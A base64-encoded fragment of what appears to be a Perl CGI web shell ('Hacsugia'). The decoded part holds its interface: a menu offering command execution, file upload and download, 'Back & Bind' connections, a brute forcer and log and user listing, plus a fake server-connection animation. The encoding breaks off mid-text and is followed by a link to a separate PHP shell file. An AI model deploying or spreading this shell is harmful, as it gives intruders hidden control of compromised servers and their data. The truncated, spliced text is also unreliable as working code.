LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJbXkgJGRpciA9JEN1cnJlbnREaXI7DQoJJGRpcj1+IHMvXFwvXFxcXC9nOw0KCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOw0KCXByaW50IDw8RU5EOw0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+DQoNCiRIdG1sTWV0YUhlYWRlcg0KDQo8L2hlYWQ+DQo8c3R5bGU+DQpib2R5ew0KZm9udDogMTBwdCBWZXJkYW5hOw0KfQ0KdHIgew0KQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7DQpjb2xvcjogI2ZmOTkwMDsNCn0NCnRkIHsNCkJPUkRFUi1SSUdIVDogICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMzZTNlM2UgMXB4IHNvbGlkOw0KY29sb3I6ICMyQkE4RUM7DQpmb250OiAxMHB0IFZlcmRhbmE7DQp9DQoNCnRhYmxlIHsNCkJPUkRFUi1SSUdIVDogICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMzZTNlM2UgMXB4IHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzExMTsNCn0NCg0KDQppbnB1dCB7DQpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOw0KZm9udDogMTBwdCBWZXJkYW5hOw0KY29sb3I6ICNmZjk5MDA7DQp9DQoNCmlucHV0LnN1Ym1pdCB7DQp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47DQpjb2xvcjogI0ZGRkZGRjsNCmJvcmRlci1jb2xvcjogIzAwOTkwMDsNCn0NCg0KY29kZSB7DQpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsNCkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOw0KZm9udDogMTBwdCBWZXJkYW5hIGJvbGQ7DQpjb2xvcjogd2hpbGU7DQp9DQoNCnJ1biB7DQpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsNCmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOw0KY29sb3I6ICNGRjAwQUE7DQp9DQoNCnRleHRhcmVhIHsNCkJPUkRFUi1SSUdIVDogICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMzZTNlM2UgMXB4IHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzFiMWIxYjsNCmZvbnQ6IEZpeGVkc3lzIGJvbGQ7DQpjb2xvcjogI2FhYTsNCn0NCkE6bGluayB7DQoJQ09MT1I6ICMyQkE4RUM7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KQTp2aXNpdGVkIHsNCglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCgl0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47DQoJY29sb3I6ICNmZjk5MDA7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KQTphY3RpdmUgew0KCWNvbG9yOiBSZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KDQoubGlzdGRpciB0cjpob3ZlcnsNCgliYWNrZ3JvdW5kOiAjNDQ0Ow0KfQ0KLmxpc3RkaXIgdHI6aG92ZXIgdGR7DQoJYmFja2dyb3VuZDogIzQ0NDsNCgl0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47DQoJY29sb3I6ICNGRkZGRkY7IFRFWFQtREVDT1JBVElPTjogbm9uZTsNCn0NCi5ub3RsaW5lew0KCWJhY2tncm91bmQ6ICMxMTE7DQp9DQoubGluZXsNCgliYWNrZ3JvdW5kOiAjMjIyOw0KfQ0KPC9zdHlsZT4NCjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPg0KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpDQp7DQoJLyp2YXIgYWpheD0nYWpheF9Qb3N0RGF0YSgiRm9ybVBlcm1zXycraSsnIiwiJFNjcmlwdExvY2F0aW9uIiwiUmVzcG9uc2VEYXRhIik7IHJldHVybiBmYWxzZTsnOyovDQoJdmFyIGFqYXg9IiI7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVQZXJtc18iK2kpLmlubmVySFRNTD0iPGZvcm0gbmFtZT1Gb3JtUGVybXNfIiArIGkrICIgYWN0aW9uPScgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOw0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ0ZXh0XyIgKyBpKS5mb2N1cygpOw0KfQ0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpDQp7DQoJcmVzcG9uc2UuaW5uZXJIVE1MID0gIjxzcGFuIG9uY2xpY2s9XFxcImNobW9kX2Zvcm0oIiArIGkgKyAiLCciKyBmaWxlKyAiJylcXFwiID4iKyBwZXJtcyArIjwvc3Bhbj48L3RkPiI7DQp9DQpmdW5jdGlvbiByZW5hbWVfZm9ybShpLGZpbGUsZikNCnsNCgl2YXIgYWpheD0iIjsNCglmLnJlcGxhY2UoL1xcXFwvZywiXFxcXFxcXFwiKTsNCgl2YXIgYmFjaz0icm1fcmVuYW1lX2Zvcm0oIitpKyIsXFxcIiIrZmlsZSsiXFxcIixcXFwiIitmKyJcXFwiKTsgcmV0dXJuIGZhbHNlOyI7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nIG1ldGhvZD0nUE9TVCc+PGlucHV0IGlkPXRleHRfIiArIGkgKyAiICBuYW1lPXJlbmFtZSB0eXBlPXRleHQgdmFsdWU9ICciK2ZpbGUrIicgLz48aW5wdXQgdHlwZT1zdWJtaXQgY2xhc3M9J3N1Ym1pdCcgb25jbGljaz0nIiArIGFqYXggKyAiJyB2YWx1ZT1PSz48aW5wdXQgdHlwZT1zdWJtaXQgY2xhc3M9J3N1Ym1pdCcgb25jbGljaz0nIiArIGJhY2sgKyAiJyB2YWx1ZT1DYW5jZWw+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YSB2YWx1ZT0nZ3VpJz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kIHZhbHVlPSckZGlyJz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1mIHZhbHVlPSciK2ZpbGUrIic+PC9mb3JtPiI7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7DQp9DQpmdW5jdGlvbiBybV9yZW5hbWVfZm9ybShpLGZpbGUsZikNCnsNCglpZihmPT0nZicpDQoJew0KCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsNCgl9ZWxzZQ0KCXsNCgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOw0KCX0NCn0NCjwvc2NyaXB0Pg0KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiMwYzBjMGMiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCI+DQo8Y2VudGVyPjxjb2RlPg0KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8dHI+DQoJPHRkIGFsaWduPSJjZW50ZXIiIHJvd3NwYW49Mj4NCgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4NCgk8L3RkPg0KDQoJPHRkPg0KDQoJCTxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPiRFTlZ7IlNFUlZFUl9TT0ZUV0FSRSJ9PC9mb250Pg0KCTwvdGQ+DQoJPHRkPlNlcnZlciBJUDo8Zm9udCBjb2xvcj0iI2JiMDAwMCI+ICRFTlZ7J1NFUlZFUl9BRERSJ308L2ZvbnQ+IHwgWW91ciBJUDogPGZvbnQgY29sb3I9IiNiYjAwMDAiPiRFTlZ7J1JFTU9URV9BRERSJ308L2ZvbnQ+DQoJPC90ZD4NCg0KPC90cj4NCg0KPHRyPg0KPHRkIGNvbHNwYW49IjMiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uIj5Ib21lPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Z3VpJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5HVUk8L2E+IHwgDQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT11cGxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPlVwbG9hZCBGaWxlPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwNCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9YmFja2JpbmQiPkJhY2sgJiBCaW5kPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1jaGVja2xvZyI+Q2hlY2sgTG9nPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1kb21haW5zdXNlciI+RG9tYWlucy9Vc2VyczwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwNCjxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSIjIj5IZWxwPC9hPg0KDQo8L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KDQoJcHJpbnQgPDxFTkQ7DQo8cHJlPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7DQogIGlmKCh0eXBlb2YgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQgPT0gInVuZGVmaW5lZCIpIHx8ICh0eXBlb2YgZWxlbWVudC5pbm5lckhUTUwgPT0gInVuZGVmaW5lZCIpKSB7DQogICAgdGhpcy5ydW5uaW5nID0gdHJ1ZTsJLy8gTmV2ZXIgcnVuLg0KICAgIHJldHVybjsNCiAgfQ0KICB0aGlzLmVsZW1lbnQgPSBlbGVtZW50Ow0KICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsNCiAgdGhpcy5pbnRlcnZhbCA9ICh0eXBlb2YgaW50ZXJ2YWwgPT0gInVuZGVmaW5lZCIgPyAxMDAgOiBpbnRlcnZhbCk7DQogIHRoaXMub3JpZ1RleHQgPSB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MOw0KICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0Ow0KICB0aGlzLmN1cnNvciA9IChjdXJzb3IgPyBjdXJzb3IgOiAiIik7DQogIHRoaXMuY3VycmVudFRleHQgPSAiIjsNCiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7DQogIHRoaXMuZWxlbWVudC50eXBpbmdUZXh0ID0gdGhpczsNCiAgaWYodGhpcy5lbGVtZW50LmlkID09ICIiKSB0aGlzLmVsZW1lbnQuaWQgPSAidHlwaW5ndGV4dCIgKyBUeXBpbmdUZXh0LmN1cnJlbnRJbmRleCsrOw0KICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOw0KICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsNCiAgdGhpcy5pblRhZyA9IGZhbHNlOw0KICB0aGlzLnRhZ0J1ZmZlciA9ICIiOw0KICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOw0KICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiIjsNCn0NClR5cGluZ1RleHQuYWxsID0gbmV3IEFycmF5KCk7DQpUeXBpbmdUZXh0LmN1cnJlbnRJbmRleCA9IDA7DQpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgew0KICBmb3IodmFyIGkgPSAwOyBpIDwgVHlwaW5nVGV4dC5hbGwubGVuZ3RoOyBpKyspIFR5cGluZ1RleHQuYWxsW2ldLnJ1bigpOw0KfQ0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7DQogIGlmKHRoaXMucnVubmluZykgcmV0dXJuOw0KICBpZih0eXBlb2YgdGhpcy5vcmlnVGV4dCA9PSAidW5kZWZpbmVkIikgew0KICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuDQogICAgcmV0dXJuOw0KICB9DQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsNCi8vICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5vcmlnVGV4dC5yZXBsYWNlKC88KFtePF0pKj4vLCAiIik7ICAgICAvLyBTdHJpcCBIVE1MIGZyb20gdGV4dC4NCiAgaWYodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoKSB7DQogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciA9ICI8IjsNCiAgICAgIHRoaXMuaW5UYWcgPSB0cnVlOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsNCiAgICAgIHRoaXMudGFnQnVmZmVyICs9ICI+IjsNCiAgICAgIHRoaXMuaW5UYWcgPSBmYWxzZTsNCiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsNCiAgICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciA9ICImIjsNCiAgICAgIHRoaXMuaW5IVE1MRW50aXR5ID0gdHJ1ZTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgew0KICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9ICI7IjsNCiAgICAgIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMuaW5IVE1MRW50aXR5KSB7DQogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSB7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOw0KICAgIH0NCiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsNCiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MICs9ICh0aGlzLmN1cnJlbnRDaGFyIDwgdGhpcy5vcmlnVGV4dC5sZW5ndGggLSAxID8gKHR5cGVvZiB0aGlzLmN1cnNvciA9PSAiZnVuY3Rpb24iID8gdGhpcy5jdXJzb3IodGhpcy5jdXJyZW50VGV4dCkgOiB0aGlzLmN1cnNvcikgOiAiIik7DQogICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsNCiAgfSBlbHNlIHsNCgl0aGlzLmN1cnJlbnRUZXh0ID0gIiI7DQoJdGhpcy5jdXJyZW50Q2hhciA9IDA7DQogICAgICAgIHRoaXMucnVubmluZyA9IGZhbHNlOw0KICAgICAgICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2soKTsNCiAgfQ0KfQ0KPC9zY3JpcHQ+DQo8L3ByZT4NCg0KPGZvbnQgc3R5bGU9ImZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsiPkNvcHlyaWdodCAoQykgMjAwMSBSb2hpdGFiIEJhdHJhIDwvZm9udD48YnI+PGJyPg0KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+DQo8dGJvZHk+PHRyPg0KPHRkIHZhbGlnbj0idG9wIiBiYWNrZ3JvdW5kPSJodHRwOi8vZGwuZHJvcGJveC5jb20vdS8xMDg2MDA1MS9pbWFnZXMvbWF0cmFuLmdpZiI+PHAgaWQ9ImhhY2siIHN0eWxlPSJtYXJnaW4tbGVmdDogM3B4OyI+DQo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4NCg0KPGZvbnQgY29sb3I9IiMwMDk5MDAiPiBUcnlpbmcgY29ubmVjdCB0byBTZXJ2ZXIgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLjwvZm9udD48YnI+DQo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4NCjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PC9mb250PiBDaGVja2luZyBTZXJ2ZXIgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLjwvZm9udD4gPGJyPg0KDQo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPg0KDQo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD5cJCBDb25uZWN0ZWQgQ29tbWFuZCEgPC9mb250Pjxicj4NCjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+DQo8L3RyPg0KPC90Ym9keT48L3RhYmxlPg0KPGJyPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsNClR5cGluZ1RleHQucnVuQWxsKCk7DQoNCjwvc2NyaXB0Pg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQWRkIGh0bWwgc3BlY2lhbCBjaGFycw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEh0bWxTcGVjaWFsQ2hhcnMoJCl7DQoJbXkgJHRleHQgPSBzaGlmdDsNCgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsNCgkkdGV4dCA9fiBzLyIvJnF1b3Q7L2c7DQoJJHRleHQgPX4gcy8nLyYjMDM5Oy9nOw0KCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7DQoJ…" https://raw.githubusercontent.com/PsychoH4x0r/shellv1/main/Shellv1.txt#:~:text=%3C%3Fphp%0A%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%0A%23%20%20%20Unknown1337%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%23%0A%23%09Coded,br%3E%3Cbr%3E%0A%3C/html%3E